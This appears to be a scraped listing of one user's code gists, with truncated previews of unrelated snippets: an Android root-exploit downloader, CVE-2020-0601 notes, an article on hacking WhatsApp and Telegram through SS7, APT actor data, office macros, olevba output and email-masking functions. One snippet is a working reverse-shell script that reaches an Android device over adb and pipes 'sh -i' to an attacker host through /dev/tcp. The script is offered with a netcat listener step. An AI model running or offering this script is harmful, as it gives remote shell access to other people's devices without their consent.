yuhisern7

#!/bin/bash

# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;

# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";

yuhisern7

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

• Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
• The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
• The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

• NSA description:
• NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.

yuhisern7

Researchers are easily able to hack WhatsApp and Telegram using the known telecom flaw
 
We continuously receive queries from readers about how to hack WhatsApp. The world’s most popular cross platform messaging App is seen to be ultimate hack by many because it has recently enabled 256-bit encryption.
 
For ordinary souls this encryption would take days and months to decode a sentence or a complete message. Ditto with another secure messaging service called Telegram. Though Telegram is not as popular as WhatsApp, it has its ardent group of followers who use it for its encryption as well as snooping free service.
 
Though both of these Apps are end-to-end encrypted both of them suffer from hardware side vulnerability which can be exploited to hack and hijack both WhatsApp and Telegram.
 
The vulnerability lies in Signalling System 7, or SS7, the technology used by telecom operators, on which the highly secure messaging system and telephone calls rely. SS7 is a set of telephony signalling protocols developed i

yuhisern7

Overview

The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

• APT33
• APT34
• APT39
• Charming Kitten

yuhisern7

sub StraightQuotes2CurlyQuotes
' Kudos to David for main code: https://gist.github.com/dajare/3924560
' Kudos to Villeroy for simpler, better find patterns:
'	https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
' Kudos to Kaloian Droganov for how to make the macro atomic:
'	http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
rem ----------------------------------------------------------------------
dim document	as object
dim dispatcher	as object
dim undo		as object

yuhisern7

olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------

yuhisern7

param(
    [string]$baseDir = "C:\SomeFolderToStoreTheData\",
    [string]$bw_client =  "000",
    [string]$bw_user = "YOURUSERNAME",
    [string]$bw_password = "YOURPASSWORD",
    [string]$filePath = "Path to Analysis Office Excel.xlsx",
    [string]$year_column = "Analysis Technical Name of Year column"
)
# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/

yuhisern7

#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie 
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"

yuhisern7

/* Not sure if this has any effect against email scraping bots but it's an idea.
   It just outputs the string as an array of character codes, then restores it 
   real characters after the page loads. With javascript disabled we fail. :( */

// PHP function ///////////////////////////////////
function mask($str) {
  $mask = "";
  for($c=0;$c<strlen($str);$c++) {
    $mask .= "" . ord($str[$c]) . ",";
  }

yuhisern7

/* 
	Create a Mask in an email address
	This function create a mask using a valid email address.
	This is usefull when someone need to confirm the email used in a system
	Author: Gabriel Froes - https://gist.github.com/gabrielfroes
 */
function emailMask(email) {
	var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
	var previous	= "";
	for(i=0;i<maskedEmail.length;i++){